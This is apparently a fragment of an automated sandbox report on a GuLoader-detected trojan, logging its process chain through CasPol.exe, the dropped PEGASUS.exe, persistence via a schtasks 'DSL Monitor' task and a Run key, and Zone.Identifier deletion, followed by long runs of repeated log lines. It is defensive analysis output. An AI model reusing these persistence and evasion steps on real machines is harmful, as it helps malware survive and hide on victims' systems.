            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dll
            Source: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exeSection loaded: edgegdi.dll
            Source: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dll
            Source: Doc0011222003.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Doc0011222003.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\Doc0011222003.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: unknownProcess created: C:\Users\user\Desktop\Doc0011222003.exe "C:\Users\user\Desktop\Doc0011222003.exe"
            Source: C:\Users\user\Desktop\Doc0011222003.exeProcess created: C:\Windows\System32\backgroundTaskHost.exe "C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
            Source: C:\Users\user\Desktop\Doc0011222003.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\Doc0011222003.exe"
            Source: C:\Windows\System32\backgroundTaskHost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpF23C.tmp
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe 0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe "C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe "C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe"
            Source: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe"
            Source: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe"
            Source: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe"
            Source: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpF23C.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile created: C:\Users\user\AppData\Roaming\MAGTTEKNIKJump to behavior
            Source: C:\Users\user\Desktop\Doc0011222003.exeFile created: C:\Users\user\AppData\Local\Temp\~DF17840D1CFFE91843.TMPJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@18/9@23/7
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{27c2db5e-046a-4be3-bf54-d8c28b5671f9}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5176:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6024:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:304:WilStaging_02
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6024:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5176:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:304:WilStaging_02
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000014.00000002.79927031030.0000000000510000.00000040.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.78191516120.0000000000540000.00000040.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.79578342155.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.79811126050.0000000000560000.00000040.00000010.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Doc0011222003.exeCode function: 2_2_00405840 push ds; ret
            Source: C:\Users\user\Desktop\Doc0011222003.exeCode function: 2_2_00409069 push edx; ret
            Source: C:\Users\user\Desktop\Doc0011222003.exeCode function: 2_2_0040415D push edx; retf
            Source: C:\Users\user\Desktop\Doc0011222003.exeCode function: 2_2_00405EB0 push cs; iretd
            Source: C:\Users\user\Desktop\Doc0011222003.exeCode function: 2_2_00403B17 push ebx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 23_2_00E096B1 push ebx; retf
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 23_2_00E096B5 push ebx; retf
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 23_2_00E096B9 push ebx; retf
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 23_2_00E096BD push ebx; retf
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 23_2_20430EB0 push ds; retf
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 27_2_00D096B1 push ebx; retf
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 27_2_00D096B5 push ebx; retf
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 27_2_00D096B9 push ebx; retf
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 27_2_00D096BD push ebx; retf
            Source: initial sampleStatic PE information: section name: .text entropy: 7.08459440381
            Source: initial sampleStatic PE information: section name: .text entropy: 7.08459440381
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile created: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exeJump to dropped file

            Boot Survival:

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: C:\Windows\System32\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpF23C.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run apodictiveJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run apodictiveJump to behavior

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe:Zone.Identifier read attributes | delete
            Source: C:\Users\user\Desktop\Doc0011222003.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Doc0011222003.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Doc0011222003.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
